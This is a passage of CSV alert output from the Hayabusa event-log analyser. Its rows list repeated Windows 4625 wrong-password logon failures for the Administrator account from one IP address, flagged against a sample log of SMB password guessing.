NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XA7eJrFopzOb3YQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2XoSwawv7Ji26GQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 637CaCAc9u7z99X7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Y6Pww45qxQjrZ0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5CPU20SF5i6Cdq34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: HAdaPDVTws6TObvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KUCoisntgbX7Mnis | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MFN0b769jRyDxyAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKr2OCyezvSEsHBZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QN3snXM4mwhauvvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1VpvQgnwXVxRY1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5bsnUZjpHrbD6kN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hpL2QnQ0kKqU40a6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rpkpNfeTsOeXEsJ0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5mBhuTFm02IjipEw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ908ZOCkSBC7tms | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8l7Bct5nMTZHd5mK | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRk6e7SrInMDsdMV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhGByctTcM7NXGtB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BgzhW3Pd5JAB8j4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZOm1J5kdItrQpGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DK77Hylw8CJHVGvb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: pf7DQVQY7AowT8NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4us3HR9jseQWIHt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJRmgooz8CXjB6E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkjIXxAvEDrPFUpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ENc8aqouBangyUrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7flMdluc8YRhOuzn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WFqeMJIXGDjDP0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iKeRDzfuDCJSv4Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gNEYkgBoG8rAE6SP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vyy1aBvh6lJBs5M5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhiWNroUS5X5AEh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg9rUUIwEfujwCvq | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zfvpeyTKc3YYkVkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJGR6CYKLUJp2fWl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cmSap0AJZq0KMRBV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnVCbq1IYZF19oYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVaDMa2uNXTZNcBj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: ymf6Fhv5ieWwcq73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CT6YMlX1GqeEuAHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FDJ1IFpMNQ2Euhyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EGTzqnHJIiZdSgNk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: epSckAKbAp8qag89 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NNC8ilAuznKPwFvV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wObt647cIBPiVaZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nYDe1L7NNxDGQ0Vt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXroClxv7B0aCTYv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kCVah2QOH1hMSV76 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2HjD65Xy4Hppim2l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwmEQxC4iTcF4aFu | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q3QxOH7ok8RR068t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJFj6Ckw1HdK9w52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qqu3Im4HXQNyGnYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bk5dmjQDnpSlREum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pk4BvYgXBR2whf80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: i6n1su2TUr7ONQr4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: givsEAGfG0smN9Re | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i2YuM0i7a2QuY7xb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xuocQPZpd91adY0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PvGB1dZrfDWyZoqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4oi8iL88rJo7g2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3OUnytXi4NjvqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WKkJcp3TYj31iJUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0E44RVqAE1feU0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny5LCb1qOIUhxOPY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9jcDgzzqH26DjQ1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yil94cFkU6UP24SK | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkdVHF3vggCcuNdn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dRRI2CS3aVIX4nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: chDZq3VgxIE2mRb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HLVvgMmqLXKZADON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i4avO2AJSlNb0IUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
